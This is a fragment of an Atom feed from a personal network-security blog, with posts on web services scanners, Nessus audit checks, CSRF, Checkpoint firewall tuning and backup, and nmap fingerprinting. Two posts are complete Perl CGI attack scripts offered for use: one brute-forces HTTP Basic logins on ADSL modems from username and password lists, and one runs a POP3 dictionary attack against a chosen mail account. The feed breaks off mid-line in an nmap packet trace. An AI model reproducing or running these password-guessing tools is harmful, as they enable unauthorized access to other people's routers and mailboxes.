src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15897828.post-3157420798274302350</id><published>2008-09-08T22:26:00.002+03:00</published><updated>2008-09-08T22:28:38.402+03:00</updated><title type='text'>Cross Domain Issue</title><content type='html'>That's really points what could be done with Cross Domain requests..&lt;br /&gt;&lt;br /&gt;&lt;a href="http://msdn.microsoft.com/en-us/library/cc709423(VS.85).aspx"&gt;http://msdn.microsoft.com/en-us/library/cc709423(VS.85).aspx&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15897828-3157420798274302350?l=keserix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://keserix.blogspot.com/feeds/3157420798274302350/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15897828&amp;postID=3157420798274302350' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/3157420798274302350'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/3157420798274302350'/><link rel='alternate' type='text/html' href='http://keserix.blogspot.com/2008/09/cross-domain-issue.html' title='Cross Domain Issue'/><author><name>pazi</name><uri>http://www.blogger.com/profile/02246518574659712982</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15897828.post-6885751791074154812</id><published>2008-08-24T17:57:00.002+03:00</published><updated>2008-08-24T18:05:42.062+03:00</updated><title type='text'>SANS Certification</title><content type='html'>Sans has an good certification called "GIAC Secure Software Programmer - Java (GSSP-JAVA)" the topics and consept both includes web based attacks and also security issues with  java design itself. In europe they had a session in London. I hope on November they will arrange one.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15897828-6885751791074154812?l=keserix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://www.giac.org/certifications/software/gssp-java.php' title='SANS Certification'/><link rel='replies' type='application/atom+xml' href='http://keserix.blogspot.com/feeds/6885751791074154812/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15897828&amp;postID=6885751791074154812' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/6885751791074154812'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/6885751791074154812'/><link rel='alternate' type='text/html' href='http://keserix.blogspot.com/2008/08/sans-certification.html' title='SANS Certification'/><author><name>pazi</name><uri>http://www.blogger.com/profile/02246518574659712982</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15897828.post-4832357279039705458</id><published>2008-07-07T00:14:00.003+03:00</published><updated>2008-07-07T00:21:16.890+03:00</updated><title type='text'>Web Services Security implementation</title><content type='html'>If you want to quick look at Web Services security related issues. Vordel ' s SoapBox provides some basic implemantations like WS-Sec, Xml-encryption, Xml-signature and Authentication demos . The usage is like a web service client, trial version has 5 request limits. Good job  :]&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.vordel.com/"&gt;http://www.vordel.com/&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15897828-4832357279039705458?l=keserix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://keserix.blogspot.com/feeds/4832357279039705458/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15897828&amp;postID=4832357279039705458' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/4832357279039705458'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/4832357279039705458'/><link rel='alternate' type='text/html' href='http://keserix.blogspot.com/2008/07/good-tool-for-web-services-security.html' title='Web Services Security implementation'/><author><name>pazi</name><uri>http://www.blogger.com/profile/02246518574659712982</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15897828.post-1354379327621963623</id><published>2008-04-25T09:17:00.000+03:00</published><updated>2008-04-25T09:45:01.984+03:00</updated><title type='text'>Nessus Audits checks</title><content type='html'>Audit checks on nessus are the one of my works that i implemented and using  for local scans. Using audit feature you have subscribe direct feed.As most of you may think getting plugins 1 week later no problem at all, in my opinion using audit checks really force your controls and make less talks  to system owners. &lt;br /&gt;&lt;br /&gt;We use local audit checks with two nessus server and scan  400+ servers in 4 times a year .Audit checks performs checking our domain policy on servers , application/web server related controls and also some specific *nix box controls. the scripting language is not alike nasl-naslv2. it has a new and basic syntax.In tenable site you can download prepared ready audits or compliance check tools for preparing some windows base domain policy checks.&lt;br /&gt;&lt;br /&gt;Here are some examples that i implement for IIS auditing =&gt; &lt;br /&gt;&lt;br /&gt;&lt;custom_item&gt;&lt;br /&gt;   type: REGISTRY_SETTING&lt;br /&gt;  description: "Enable Non UTF-8 control."&lt;br /&gt;  value_type: POLICY_DWORD&lt;br /&gt;  value_data: 0&lt;br /&gt;  reg_key: "HKLM\System\CurrentControlSet\Services\HTTP\Parameters"&lt;br /&gt;  reg_item: "EnableNonUTF8"&lt;br /&gt;  reg_type: REG_DWORD&lt;br /&gt;&lt;/item&gt;&lt;br /&gt;&lt;br /&gt;&lt;custom_item&gt;&lt;br /&gt;        type: FILE_CONTENT_CHECK&lt;br /&gt;        description: "Encode Weblogs in UTF8 control"&lt;br /&gt;        value_type: POLICY_TEXT&lt;br /&gt;        value_data: "C:\WINDOWS\system32\inetsrv\MetaBase.xml"&lt;br /&gt;        regex: "LogInUTF8=.*"&lt;br /&gt;        expect: "LogInUTF8="TRUE""&lt;br /&gt;&lt;/item&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15897828-1354379327621963623?l=keserix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://keserix.blogspot.com/feeds/1354379327621963623/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15897828&amp;postID=1354379327621963623' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/1354379327621963623'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/1354379327621963623'/><link rel='alternate' type='text/html' href='http://keserix.blogspot.com/2008/04/nessus-audits-checks.html' title='Nessus Audits checks'/><author><name>pazi</name><uri>http://www.blogger.com/profile/02246518574659712982</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15897828.post-1278505317163989539</id><published>2008-01-28T14:27:00.000+02:00</published><updated>2008-04-28T15:48:12.285+03:00</updated><title type='text'>Web Services Scanner</title><content type='html'>After a long research last year i approved to use SoapSonar web services scanner from the company crosschecknet. The update option of product really mass, you have to redownload and install all product from the scratch but the options like compliance and performance checks and also  vulnerability were really good enough.&lt;br /&gt;Within 2 years time this kind of professional scanners will be popular and used within most companies. Before crosschecknet i was in touch with  one opensource web services scanners, i said one because there is  not much its belongs WSDigger from Foundstone(Mcafee*) company. But it  restrict to only XPATH &amp; blind XPATH injection.&lt;br /&gt;  &lt;br /&gt;You have also one option, using webscarab web services parser and fuzzing if good enough in fuzzer and web services vulnerability string or signatures .That's really enjoyable and attractive but needs so many workout.&lt;br /&gt;&lt;br /&gt;So the product in web services =&gt;&lt;br /&gt;1.SoapSonar from Crosschecknet&lt;br /&gt;2.And other web vulnerability scanners that have option to scan web services..(not really good its a focus problem:)&lt;br /&gt;3.Opensource wsdl parsers and fuzzers.&lt;br /&gt;&lt;br /&gt;And the fourth one is i will open a opensource project about that just in plan phase , like web based web services scanner the one will give the wsdl address and my engine will scan the services..Sourceforge will be the address soon..&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15897828-1278505317163989539?l=keserix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://keserix.blogspot.com/feeds/1278505317163989539/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15897828&amp;postID=1278505317163989539' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/1278505317163989539'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/1278505317163989539'/><link rel='alternate' type='text/html' href='http://keserix.blogspot.com/2008/04/web-services-scanner_28.html' title='Web Services Scanner'/><author><name>pazi</name><uri>http://www.blogger.com/profile/02246518574659712982</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15897828.post-3856896700144793642</id><published>2007-09-28T18:31:00.000+03:00</published><updated>2008-04-28T15:41:50.473+03:00</updated><title type='text'>XSRF an per-page-tokens</title><content type='html'>XSRF or some says CSRF is a logical vulnerability in my opinion. You prepare an html page that's a post or get&lt;br /&gt;and wait user to visit your page. After user visited your page you vulnerable site submit the form and make some stuff related with other site that you have already logged in !! must login  really not important. You can phish the user to login by any way because its the real site..&lt;br /&gt;&lt;br /&gt;Here is the scenario&lt;br /&gt;&lt;br /&gt;1.You login vulnerable page, in the vulnerable page there is a javascript or banner that matchs my bank login with real adress that's not the fake.&lt;br /&gt;&lt;br /&gt;2.Victim then open xxx bank site and really login.&lt;br /&gt;&lt;br /&gt;3.With using CSRF i post my money transfer to user with using ajax,html form or usign serverside languages php-zend,java web socket..&lt;br /&gt;&lt;br /&gt;4. Booomm i transfer the money if the site do not have any per page token control and the user only see the transaction page that i did :))&lt;br /&gt;&lt;br /&gt;So the prevention&lt;br /&gt;&lt;br /&gt;using per-page token is the only preventive method but it costs to many on developer site, however that's a logical prevention and may be apply some important pages of the site for preventing XSRF..&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15897828-3856896700144793642?l=keserix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://keserix.blogspot.com/feeds/3856896700144793642/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15897828&amp;postID=3856896700144793642' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/3856896700144793642'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/3856896700144793642'/><link rel='alternate' type='text/html' href='http://keserix.blogspot.com/2007/09/xsrf-per-page-tokens.html' title='XSRF an per-page-tokens'/><author><name>pazi</name><uri>http://www.blogger.com/profile/02246518574659712982</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15897828.post-114733584662205152</id><published>2006-05-11T11:22:00.000+03:00</published><updated>2006-05-29T16:11:17.516+03:00</updated><title type='text'>Adsl modem password finder</title><content type='html'>tihs is another my cgi script , the word matching algortihm is perfect taking from&lt;br /&gt;websec.org.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;#!/usr/bin/perl&lt;br /&gt;&lt;br /&gt;###################################&lt;br /&gt;&lt;br /&gt;use LWP;&lt;br /&gt;use Getopt::Std;&lt;br /&gt;use HTTP::Request::Common;&lt;br /&gt;use HTTP::Response;&lt;br /&gt;use MIME::Base64;&lt;br /&gt;use CGI qw(:all);&lt;br /&gt;&lt;br /&gt;use vars qw($opt_a $opt_u $opt_p $opt_l $opt_v);&lt;br /&gt;getopts("a:u:p:l:v:");&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;## vardecs&lt;br /&gt;##&lt;br /&gt;&lt;br /&gt;my $userfile = "/tmp/username";&lt;br /&gt;my $passfile = "/tmp/password";&lt;br /&gt;my %BASEPASS;&lt;br /&gt;print header, start_html();&lt;br /&gt;my $ipaddress = param("password");&lt;br /&gt;print end_html();&lt;br /&gt; open(UF, "&lt; $userfile") || die "\ncant open $userfile\n";&lt;br /&gt;&lt;br /&gt;while (&lt;UF&gt;)&lt;br /&gt;{&lt;br /&gt;my $uid = $_;&lt;br /&gt;&lt;br /&gt;##&lt;br /&gt;open(PF, "&lt; $passfile") || die "\ncant open $passfile\n";&lt;br /&gt;##&lt;br /&gt;while (&lt;PF&gt;)&lt;br /&gt;{&lt;br /&gt;my $pwd = $_;&lt;br /&gt;&lt;br /&gt;my $user_agent = new LWP::UserAgent;&lt;br /&gt;$user_agent-&gt;agent("Mozilla/4.0(compatible;MSIE 6.0;Windows NT 5.0)");&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;$uid =~ s/[\n\r]//g;&lt;br /&gt;$pwd =~ s/[\n\r]//g;&lt;br /&gt;$pwd = &amp;special($uid,$pwd);&lt;br /&gt;&lt;br /&gt;my $response = $user_agent-&gt;request(GET "$ipaddress", Authorization =&gt; "Basic ".encode_base64("$uid:$pwd"));&lt;br /&gt;&lt;br /&gt;if ($response-&gt;is_success)&lt;br /&gt;{&lt;br /&gt;print p("Kullanici_Adi: $uid");&lt;br /&gt;print p("Sifre:$pwd");&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;else&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;#print p("Sifre Bulunamadi");&lt;br /&gt;#print RF "$uid:$pwd (",$response-&gt;code(),")\n" if ($logfile ne '');&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;close(PF);&lt;br /&gt;}&lt;br /&gt;close (UF);&lt;br /&gt;close (RF);&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;### sub special (pwd,uid)&lt;br /&gt;### returns pwd&lt;br /&gt;&lt;br /&gt;sub special&lt;br /&gt;{&lt;br /&gt;my $u = shift;&lt;br /&gt;my $p = shift;&lt;br /&gt;&lt;br /&gt;## check for %%UID%% in password&lt;br /&gt;##&lt;br /&gt;$p =~ s/%%UID%%/$u/ if($p =~ /%%UID%%/);&lt;br /&gt;&lt;br /&gt;## check for %%UIDREV%% in password&lt;br /&gt;&lt;br /&gt;##&lt;br /&gt;if ($p =~ /%%UIDREV%%/)&lt;br /&gt;{&lt;br /&gt;my $tmp = "";&lt;br /&gt;my $c = 0;&lt;br /&gt;&lt;br /&gt;for ($c=length($u);$c&gt;=0;$c--)&lt;br /&gt;{&lt;br /&gt;$tmp .= substr($u,$c,1);&lt;br /&gt;}&lt;br /&gt;$p =~ s/%%UIDREV%%/$tmp/;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;## done&lt;br /&gt;##&lt;br /&gt;return $p;&lt;br /&gt;}&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15897828-114733584662205152?l=keserix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://keserix.blogspot.com/feeds/114733584662205152/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15897828&amp;postID=114733584662205152' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/114733584662205152'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/114733584662205152'/><link rel='alternate' type='text/html' href='http://keserix.blogspot.com/2006/05/adsl-modem-password-finder.html' title='Adsl modem password finder'/><author><name>pazi</name><uri>http://www.blogger.com/profile/02246518574659712982</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15897828.post-114733556696119526</id><published>2006-05-11T11:17:00.000+03:00</published><updated>2006-05-11T11:21:40.933+03:00</updated><title type='text'>Pop3 Dictionary Attack</title><content type='html'>This my basic perl cgi script for dictionary attack of pop3 protokol.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;#!/usr/bin/perl&lt;br /&gt;use IO::Socket;&lt;br /&gt;use Net::POP3;&lt;br /&gt;use CGI qw(:all);&lt;br /&gt;&lt;br /&gt;$pass_file = "/tmp/password";&lt;br /&gt;print header, start_html();&lt;br /&gt;my $ipaddress = param("domain");&lt;br /&gt;my $pop3user = param("isim");&lt;br /&gt;print end_html();&lt;br /&gt;open FILE, "&lt; $pass_file" || die ("\n Can not open file error...\n");&lt;br /&gt;chomp(@pazi = &lt;FILE&gt;);&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;for ($i = 0; $i &lt;= $#pazi; $i++)&lt;br /&gt;{&lt;br /&gt;$connect = Net::POP3-&gt;new("$ipaddress")&lt;br /&gt;    or  die "Connection Error to $hostname : $!\n";&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;my $response = defined($connect-&gt;login("$pop3user",$pazi[$i]));&lt;br /&gt;if ($response &gt; 0 )&lt;br /&gt;{&lt;br /&gt;print p "(Mail adresi Sifresi  $pazi[$i] )";&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt; else&lt;br /&gt;{&lt;br /&gt;print p "( Denenen Sifreler $pazi[$i] )";&lt;br /&gt;}&lt;br /&gt;$connect-&gt;quit;&lt;br /&gt;}&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15897828-114733556696119526?l=keserix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://keserix.blogspot.com/feeds/114733556696119526/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15897828&amp;postID=114733556696119526' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/114733556696119526'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/114733556696119526'/><link rel='alternate' type='text/html' href='http://keserix.blogspot.com/2006/05/pop3-dictionary-attack.html' title='Pop3 Dictionary Attack'/><author><name>pazi</name><uri>http://www.blogger.com/profile/02246518574659712982</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15897828.post-113318918800068205</id><published>2005-11-28T16:46:00.001+02:00</published><updated>2008-04-28T15:03:25.677+03:00</updated><title type='text'>Checkpoint Backup Script--</title><content type='html'>&lt;strong&gt;Checkpoint Backup Script&lt;/strong&gt;&lt;br/&gt;&lt;br/&gt;Use this script with cron deamon for getting system backup with upgrade_export..&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;#!/bin/bash&lt;br/&gt;. /opt/CPshrd-R55/tmp/.CPprofile.sh&lt;br/&gt;DATE=`date +%Y%m%d`&lt;br/&gt;FILE=$DATE"MKK_BACKUP"&lt;br/&gt;echo | /opt/CPfw1-R55/bin/upgrade_tools/upgrade_export /home/backup/$FILE&lt;br/&gt;exit 0&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15897828-113318918800068205?l=keserix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://keserix.blogspot.com/feeds/113318918800068205/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15897828&amp;postID=113318918800068205' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/113318918800068205'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/113318918800068205'/><link rel='alternate' type='text/html' href='http://keserix.blogspot.com/2005/11/checkpoint-backup-script.html' title='Checkpoint Backup Script--'/><author><name>pazi</name><uri>http://www.blogger.com/profile/02246518574659712982</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15897828.post-113286919045665918</id><published>2005-11-24T23:53:00.000+02:00</published><updated>2005-11-24T23:53:10.456+02:00</updated><title type='text'>CP Tuning</title><content type='html'>&lt;strong&gt;Linux Performance Tuning&lt;/strong&gt;&lt;br/&gt;&lt;br/&gt;The information provided in this section refers to Linux RedHat 7.2 distribution. At the same time, many of the tuning techniques and tunable parameters are also applicable to earlier 7.0 and 6.2 versions.&lt;br/&gt;&lt;br/&gt;&lt;strong&gt;1. Use Check Point SecurePlatform Linux for VPN-1 installations&lt;/strong&gt;&lt;br/&gt;&lt;br/&gt;The Check Point SecurePlatform product is Check Point version of Linux based on the Red Hat 7.2 distribution that is specifically adapted (hardened and tuned) for use with VPN-1 software. Current SecurePlatform Edition II is based on Linux kernel 2.4.9-31. It is strongly advised to use Check Point SecurePlatform for Linux-based VPN-1 installations.&lt;br/&gt;&lt;br/&gt;The rest of the Linux tuning section is only relevant if you are not using Check Point Secure Platform Linux.&lt;br/&gt;&lt;br/&gt;&lt;strong&gt;2. Use the latest Red Hat Linux kernels&lt;/strong&gt;&lt;br/&gt;&lt;br/&gt;Use the latest 2.4.x Linux kernels from Red Hat. The earliest 2.4.x kernel version suitable for use with VPN-1 use is 2.4.9-13. Current kernel recommended at the time of this guide's writing is 2.4.9-31.&lt;br/&gt;&lt;br/&gt;During the installation process select Custom Installation option. That will allow you to install only the components required for your VPN-1 installation. Install the kernel Development Environment if you are going to build customized kernels (see below).&lt;br/&gt;&lt;br/&gt;&lt;strong&gt;3. Install the latest recommended security patches&lt;/strong&gt;&lt;br/&gt;&lt;br/&gt;Latest recommended security and other patches can be downloaded from the Red Hat Errata Support Site&lt;br/&gt;&lt;br/&gt;&lt;strong&gt;4. Recompile the minimal Linux kernel optimized for your particular hardware configuration and optimized for use as IP router&lt;/strong&gt;&lt;br/&gt;&lt;br/&gt;Implementing the recommendations provided below require significant Linux system administration skill &amp; expertise. Kernel misconfiguration may render your system unusable and require a complete re-install. Follow these recommendations at your own risk.&lt;br/&gt;&lt;br/&gt;while in your Linux kernel source directory, usually /usr/src/linux, run make config or make menuconfig:&lt;br/&gt;&lt;br/&gt;- compile the kernel optimized for the particular CPU type you're using&lt;br/&gt;- leave out support &amp; drivers for all irrelevant stuff that is normally included in the default distribution kernel. Examples are: support for obscure IDE HD and floppy drives, bizarre filesystems, parallel ports, CMD640 chipset fixes, sound, etc, etc. This will produce the kernel with much smaller memory footprint which should &amp; will work faster.&lt;br/&gt;- statically compile in the drivers for hardware you're using on the gateway - NICs, relevant IDE/SCSI controllers, etc.&lt;br/&gt;- during kernel compilation, turn on the Advanced Router (CONFIG_IP_ADVANCED_ROUTER) option. This will trigger some IP router specific questions. Turn on support for large routing tables (CONFIG_IP_ROUTE_LARGE_TABLES) and Optimize for Use as Router (CONFIG_IP_ROUTER) options. Turn on large windows support (CONFIG_SKB_LARGE option). Do not turn on the native IP firewalling options (CONFIG_IP_FIREWALL, CONFIG_IP_FIREWALL_NETLINK, CONFIG_IP_TRANSPARENT_PROXY, CONFIG_IP_MASQUERADE, etc).&lt;br/&gt;- on IDE systems turn on the CONFIG_BLK_DEV_IDEDMA and CONFIG_IDEDMA_AUTO options&lt;br/&gt;- on some systems PCI bridge optimization (CONFIG_PCI_OPTIMIZED option) can improve PCI bus performance. Disable it if you experience any PCI-related problems&lt;br/&gt;&lt;br/&gt;For more info on compiling &amp; installing customized Linux kernels refer to Linux Kernel HOWTO.&lt;br/&gt;&lt;br/&gt;&lt;strong&gt;5. Disable all services &amp; daemons that are not required on your VPN-1 installation&lt;/strong&gt;&lt;br/&gt;&lt;br/&gt;As in case of other OSs, listing all unnecessary services and daemons can take a document of it's own. A good idea is to go over all of them in /etc/xinetd.d/ and /etc/rc3.d/ directories and get rid of everything that is not directly required. Few examples are: netstat, finger, pop-2/3, apmd, NFS (if possible) pcmcia, etc, etc.&lt;br/&gt;&lt;br/&gt;Do not install or run any of the X Windows components - XFree86, window managers, etc.&lt;br/&gt;&lt;br/&gt;&lt;strong&gt;6. Tune the TCPIP stack parameters for maximal security servers and logging performance&lt;/strong&gt;&lt;br/&gt;&lt;br/&gt;Linux kernel versions 2.4.x and later apparently do quite a good job of auto-tuning some the TCP stack parameters, so changing them might not be necessary. On earlier Linux kernels (versions 2.2.x are supported by the VPN-1) most of the info below is still relevant.&lt;br/&gt;&lt;br/&gt;edit /etc/rc.local, or create your own /etc/rc3.d/S100vpn1tuning file:&lt;br/&gt;&lt;br/&gt;- increase the number of TCP ephemeral (short lived) ports:&lt;br/&gt;&lt;br/&gt;echo "32768 65535" &amp;gt; /proc/sys/net/ipv4/ip_local_port_range&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;&lt;br/&gt;- turn off the TCP timestamps:&lt;br/&gt;&lt;br/&gt;echo 0 &amp;gt; /proc/sys/net/ipv4/tcp_timestamps&lt;br/&gt;&lt;br/&gt;- for better logging performance over fast LAN links, turn off SACKS and windows scaling:&lt;br/&gt;&lt;br/&gt;echo 0 &amp;gt; /proc/sys/net/ipv4/tcp_sack&lt;br/&gt;echo 0 &amp;gt; /proc/sys/net/ipv4/tcp_window_scaling&lt;br/&gt;&lt;br/&gt;- for better security servers performance over slow/noisy WAN links, turn SACKS and windows scaling on:&lt;br/&gt;&lt;br/&gt;echo 1 &amp;gt; /proc/sys/net/ipv4/tcp_sack&lt;br/&gt;echo 1 &amp;gt; /proc/sys/net/ipv4/tcp_window_scaling&lt;br/&gt;&lt;br/&gt;- increase the amount of memory associated with input and output socket buffers:&lt;br/&gt;&lt;br/&gt;echo 262144 &amp;gt; /proc/sys/net/core/rmem_default&lt;br/&gt;echo 262144 &amp;gt; /proc/sys/net/core/rmem_max&lt;br/&gt;echo 262144 &amp;gt; /proc/sys/net/core/wmem_default&lt;br/&gt;echo 262144 &amp;gt; /proc/sys/net/core/wmem_max&lt;br/&gt;&lt;br/&gt;&lt;strong&gt;7. Increase the number of file descriptors available to security servers&lt;/strong&gt;&lt;br/&gt;&lt;br/&gt;edit /etc/rc.local, or create your own /etc/rc3.d/S100vpn1tuning file:&lt;br/&gt;&lt;br/&gt;echo 65536 &amp;gt; /proc/sys/fs/inode-max&lt;br/&gt;echo 32768 &amp;gt; /proc/sys/fs/file-max&lt;br/&gt;ulimit -n 32768&lt;br/&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/15897828-113286919045665918?l=keserix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://keserix.blogspot.com/feeds/113286919045665918/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=15897828&amp;postID=113286919045665918' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/113286919045665918'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/15897828/posts/default/113286919045665918'/><link rel='alternate' type='text/html' href='http://keserix.blogspot.com/2005/11/cp-tuning.html' title='CP Tuning'/><author><name>pazi</name><uri>http://www.blogger.com/profile/02246518574659712982</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-15897828.post-113286868515928620</id><published>2005-11-24T23:44:00.000+02:00</published><updated>2005-11-24T23:44:45.160+02:00</updated><title type='text'>Identifying Checkpoint with nmap</title><content type='html'>&lt;strong&gt;Identifying Checkpoint with nmap&lt;/strong&gt;&lt;br/&gt;&lt;br/&gt;For identifying operating systems , using nmap is definitely handy and effective.In our first example we will identify CheckPoint Firewall-1.Checkpoint Firewall-1 has default open ports although the Security Engineer applied Stealht Rule .This open ports arise from FW-1 implied rules. &lt;br/&gt;&lt;br/&gt;&lt;span style="font-size:85%;"&gt;root@pazwant:~# nmap -sP&amp;nbsp;&amp;nbsp;-PS&lt;/span&gt;&lt;strong&gt;&lt;span style="font-size:85%;"&gt;18264&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/strong&gt;&lt;span style="font-size:85%;"&gt;192.168.1.200 --packet_trace&lt;/span&gt;&lt;br/&gt;&lt;span style="font-size:85%;"&gt;&lt;/span&gt;&lt;br/&gt;&lt;span style="font-size:85%;"&gt;Starting nmap 3.75 ( http://www.insecure.org/nmap/ ) at 2005-05-08 03:51 GMT+2&lt;/span&gt;&lt;br/&gt;&lt;span style="font-size:85%;"&gt;SENT (0.0240s) TCP 192.168.1.15:58825 &amp;gt; 192.168.1.200:18264 S 